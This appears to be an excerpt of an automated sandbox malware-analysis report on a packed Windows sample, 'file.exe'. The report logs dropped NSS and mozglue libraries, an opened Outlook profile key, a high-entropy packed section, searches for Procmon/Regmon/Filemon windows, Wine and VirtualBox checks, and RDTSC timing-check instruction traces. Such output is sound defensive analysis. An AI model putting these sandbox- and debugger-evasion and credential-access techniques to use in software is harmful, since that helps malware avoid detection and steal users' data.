              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: file.exeStatic file information: File size 1793024 > 1048576
              Source: file.exeStatic PE information: Raw size of trzlrlhz is bigger than: 0x100000 < 0x19e600
              Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.180000.0.unpack :EW;.rsrc :W;.idata :W; :EW;trzlrlhz:EW;xbmoezwd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;trzlrlhz:EW;xbmoezwd:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00199270
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1bc2af should be: 0x1c0591
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: trzlrlhz
              Source: file.exeStatic PE information: section name: xbmoezwd
              Source: file.exeStatic PE information: section name: .taggant
              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059485D push ebx; mov dword ptr [esp], ebp0_2_00594B0D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C push eax; mov dword ptr [esp], 77B68D3Dh0_2_004038A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C push 099F1244h; mov dword ptr [esp], edx0_2_00403908
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C push 64E96EF2h; mov dword ptr [esp], edx0_2_00403960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C push 7A0719D3h; mov dword ptr [esp], edx0_2_00403A8F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C push 3EAF2E37h; mov dword ptr [esp], edx0_2_00403AC4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040384C push ecx; mov dword ptr [esp], edx0_2_00403AE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD840 push ebp; mov dword ptr [esp], esi0_2_005AD869
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD840 push ecx; mov dword ptr [esp], edx0_2_005AD8B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD840 push edx; mov dword ptr [esp], ebp0_2_005AD936
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064382D push eax; mov dword ptr [esp], ebx0_2_0064386F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064382D push eax; mov dword ptr [esp], 20982D21h0_2_006438C6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064382D push eax; mov dword ptr [esp], edi0_2_00643983
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064382D push edx; mov dword ptr [esp], ebx0_2_0064398E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A5801 push 064FB310h; mov dword ptr [esp], eax0_2_005A5826
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00656807 push 4B935808h; mov dword ptr [esp], esp0_2_0065684B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00656807 push ebp; mov dword ptr [esp], ecx0_2_0065688E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062D00D push edi; mov dword ptr [esp], ebp0_2_0062D0B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C01B push ebx; mov dword ptr [esp], ecx0_2_0061C022
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C01B push ecx; mov dword ptr [esp], esp0_2_0061C026
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EB833 push 57AEFA65h; mov dword ptr [esp], edx0_2_004EB89F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EB833 push 673A5A5Ah; mov dword ptr [esp], ebp0_2_004EB982
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EB833 push 6AE88032h; mov dword ptr [esp], eax0_2_004EB99C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00807020 push 1606C2ACh; mov dword ptr [esp], eax0_2_0080707E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00807020 push esi; mov dword ptr [esp], 3069AFD6h0_2_008070F6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00807020 push 6876EAD6h; mov dword ptr [esp], ecx0_2_00807125
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF8FC push edx; mov dword ptr [esp], ecx0_2_005CF937
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA8EA push 7D5F6576h; mov dword ptr [esp], edi0_2_004EA9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA8EA push ebx; mov dword ptr [esp], 2AE76B6Ch0_2_004EA9D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA8EA push 09BABA4Ah; mov dword ptr [esp], eax0_2_004EAA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EA8EA push ebx; mov dword ptr [esp], edx0_2_004EAA8B
              Source: file.exeStatic PE information: section name: trzlrlhz entropy: 7.953821840467499
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00199270

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-58346
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C3C95 second address: 3C3C9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545560 second address: 545574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD000CC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD000CC0C58h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544804 second address: 54480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544AB0 second address: 544AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CFB second address: 547CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CFF second address: 547D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D03 second address: 547D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D09 second address: 547D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D0E second address: 547D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547DA4 second address: 547DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547DA9 second address: 547DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547DAF second address: 547E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7BF1BC28h 0x0000000f stc 0x00000010 push 00000003h 0x00000012 mov ecx, dword ptr [ebp+122D2DD3h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FD000CC0C58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov cx, 6D66h 0x00000038 push 00000003h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FD000CC0C58h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D3509h], edi 0x0000005a or esi, dword ptr [ebp+122D2D8Fh] 0x00000060 call 00007FD000CC0C59h 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FD000CC0C5Dh 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547E3B second address: 547E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD001095A5Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD001095A5Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547E5A second address: 547E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547F8F second address: 547F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547F93 second address: 547F98 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56870E second address: 568727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FD001095A5Ah 0x0000000c jo 00007FD001095A62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568727 second address: 56872D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531F57 second address: 531F72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD001095A63h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531F72 second address: 531F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566636 second address: 566647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FD001095A5Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566647 second address: 566654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007FD000CC0C56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566919 second address: 566928 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566AA7 second address: 566AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566AAD second address: 566AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566EA6 second address: 566EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566EBC second address: 566ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A67h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566ED7 second address: 566EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566EDD second address: 566EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD001095A56h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566EE9 second address: 566EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567038 second address: 567042 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567042 second address: 567065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD000CC0C69h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5671F2 second address: 56722A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 pushad 0x00000008 jne 00007FD001095A56h 0x0000000e je 00007FD001095A56h 0x00000014 jp 00007FD001095A56h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56722A second address: 567230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567230 second address: 567234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567234 second address: 567242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567242 second address: 567246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567394 second address: 56739A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567610 second address: 567635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FD001095A63h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56778F second address: 567793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567793 second address: 5677AB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FD001095A68h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FD001095A56h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567906 second address: 56792C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnp 00007FD000CC0C56h 0x0000000e jmp 00007FD000CC0C61h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56824E second address: 568252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568252 second address: 568266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD000CC0C5Ch 0x0000000e jne 00007FD000CC0C56h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571C52 second address: 571C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571C56 second address: 571C66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571C66 second address: 571C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571C6C second address: 571C76 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD000CC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574C9A second address: 574C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574C9E second address: 574CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57711D second address: 57714B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD001095A5Fh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5771EA second address: 577210 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD000CC0C58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 0E0EC7F1h 0x00000013 movsx edi, si 0x00000016 push 4F05B10Ch 0x0000001b pushad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5777F1 second address: 5777F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577D58 second address: 577D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
